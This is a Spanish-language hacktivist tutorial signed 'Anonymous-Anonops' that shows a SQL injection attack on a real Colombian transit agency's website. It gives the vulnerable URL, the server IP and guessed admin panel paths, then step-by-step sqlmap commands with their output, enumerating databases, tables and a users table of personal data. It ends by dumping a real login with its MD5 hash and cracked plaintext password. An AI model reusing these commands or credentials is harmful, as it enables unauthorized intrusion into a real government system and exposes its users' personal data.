Anonymous-Anonops

By : @ Miguel Anons

Presents : Inyectión sql on backtrack - kali linux .

Saludos En esta ocasión para todos y todas he decidido sacar este pequeño tutorial a través de
este documento sobre un ataque informático realizado al metro línea el año 2012 lo cual hoy en
día sigue siendo un gran problema el tema de la seguridad en muchos sitios web bajo errores de ,
sql , php , xss , y muchos errores más . Pero hoy he decidido a enseñarles ataques bajo MySQL
sql en la distribución del Linux versión kali Linux .

Bueno lo primero que vamos a hacer es lo siguiente :

Target :

[+]http://metrolinea.gov.co/

Ip= (216.227.215.125)

Error Bajo Sql :

[*]http://metrolinea.gov.co/Noticia.php?id=6´

Accesos :

http://www.metrolinea.gov.co/controlpanel/

http://www.metrolinea.gov.co/admin

http://www.metrolinea.gov.co/cms/

http://metrolinea.gov.co/controlpanel/

http://metrolinea.gov.co/cpanel/
Dns:

http://www.netip.de/dns?domain=www.metrolinea.gov.co%2F

http://www.netip.de/dns?domain=https%3A%2F%2Fwww.metrolinea.gov.co%2F

Abrimos en Applications

Bajamos a kali linux y luego en web applications , Des pues en web vulnerability Scanners y
buscamos , sqlmap y le damos clic .

Des pues escribimos los siguientes comandos en la con sola del SQL :

sqlmap-u Aquí ponemos el target de la web que vamos a inyectar con el error y des pues ponemos
--dbs Así por ejemplo :

sqlmap -u http://www.metrolinea.gov.co/Noticia.php?id=6 –dbs

y des pues presionamos la tecla “ Enter ” y esto nos saldrá Así :
Des pues nos saldrán las ( DB) Las Data Bases ó Bases De Datos . Así por ejemplo: escribimos y
ejecutamos el siguiente comando:

sqlmap -u http://www.metrolinea.gov.co/Noticia.php?id=6 -D information_schema –tables

y nos saldrá esta info : Database: information_schema [45 tables] Asi como lo muestra la
imagen con la información Así :

Database: information_schema

[45 tables]

+---------------------------------------+

| CHARACTER_SETS |

| CLIENT_STATISTICS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |

| COLUMN_PRIVILEGES |

| ENGINES |

| EVENTS |

| FILES |

| GLOBAL_STATUS |

| GLOBAL_VARIABLES |

| INDEX_STATISTICS |

| INNODB_BUFFER_PAGE |

| INNODB_BUFFER_PAGE_LRU |

| INNODB_BUFFER_POOL_STATS |

| INNODB_CMP |

| INNODB_CMPMEM |

| INNODB_CMPMEM_RESET |

| INNODB_CMP_RESET |

| INNODB_LOCKS |

| INNODB_LOCK_WAITS |

| INNODB_TRX |

| KEY_COLUMN_USAGE |

| PARAMETERS |

| PARTITIONS |

| PLUGINS |

| PROCESSLIST |

| PROFILING |

| REFERENTIAL_CONSTRAINTS |

| ROUTINES |
| SCHEMATA |

| SCHEMA_PRIVILEGES |

| SESSION_STATUS |

| SESSION_VARIABLES |

| STATISTICS |

| TABLES |

| TABLESPACES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TABLE_STATISTICS |

| THREAD_STATISTICS |

| TRIGGERS |

| USER_PRIVILEGES |

| USER_STATISTICS |

| VIEWS |

+---------------------------------------+
Y des pues volvemos y aplicamos el code : con su comando así :

sqlmap -u http://www.metrolinea.gov.co/Noticia.php?id=6 -D metro31_metrolineacsvfinal –tables

y presionamos la tecla “ Enter “ y nos saldrá la información : Asi :

sqlmap -u http://www.metrolinea.gov.co/Noticia.php?id=6 -D metro31_metrolineacsvfinal --

tables

Database: metro31_metrolineacsvfinal

[36 tables]

+------------------------+
| Pregunta |

| Respuesta |

| album |

| asunto |

| banner |

| boletin |

| cargo |

| contactenos |

| cuestionario |

| cuestionariorespuesta |

| documentos |

| faq |

| fondopagina |

| fotos |

| glosario |

| historial |

| horarioruta |

| imagenesbanner |

| imagenesmedioamb |

| imagenesninos |

| institucional |

| ipencuestas |

| metrocam |

| modulos |

| noticias |

| noticiashome |
| noticiasninos |

| ocupacion |

| pagina |

| paginasamigas |

| relusuarioshorarioruta |

| relusuariosruta |

| ruta |

| tipousuario |

| tipovehiculo |

| usuarios |

+------------------------+

Y des pues volvemos a insertar el codea si para mirar las columnas :

sqlmap -u http://www.metrolinea.gov.co/Noticia.php?id=6 -D metro31_metrolineacsvfinal -T

usuarios –columns

y nos saldrá asi la información :

Database: metro31_metrolineacsvfinal

Table: usuarios

[29 columns]

+-----------------------+----------------------+

| Column | Type |

+-----------------------+----------------------+

| apellidos | varchar(250) |

| boletinesinformativos | smallint(5) unsigned |

| campo1 | varchar(250) |

| campo2 | varchar(250) |

| campo3 | varchar(250) |
| campo4 | varchar(250) |

| celular | varchar(50) |

| ciudad | varchar(250) |

| de | varchar(250) |

| direccion | varchar(250) |

| email | varchar(250) |

| enlinea | smallint(6) |

| estadocivil | varchar(60) |

| fechanac | date |

| foto | varchar(250) |

| idcargo | int(10) unsigned |

| idocupacion | int(10) unsigned |

| idtipousuario | int(10) unsigned |

| idusuarios | int(10) unsigned |

| login | varchar(60) |

| metropuntos | int(10) unsigned |

| nombre | varchar(250) |

| nrodocumento | varchar(50) |

| pass | varchar(250) |

| permiso | smallint(5) unsigned |

| procesoinscripcion | smallint(5) unsigned |

| targetainteligente | bigint(20) |

| telefono | varchar(250) |

| tipodoc | varchar(10) |

+-----------------------+----------------------+
Des pues volvemos al code Así para los usuarios y nos saldrá la siguiente información ya para
finalizar, volvemos y ejecutamos el siguiente y último comando Así :

sqlmap -u http://www.metrolinea.gov.co/Noticia.php?id=6 -D metro31_metrolineacsvfinal -T

usuarios -C login,pass –dump

y nos saldrán los nombres o usuarios con su respectiva clave .

Usuarios:

+--------------+----------------------------------------------+

| Login | Pass |

+--------------+----------------------------------------------+

| intelconexJG | f81f083ddec3fde99e7d9bcbae0419b9 MD5->1nt3lc0n3x|

+-------------------------------------------------------------+
 Alfinalizar un largo procceso esto mequedo de evidencia con fotos y los pequeños de talles que
les publique atraves de la en señanza de hoy .

IMÁGENES :
#Anonymous-Anonops # SEA

FIN

By : @ Miguel Anons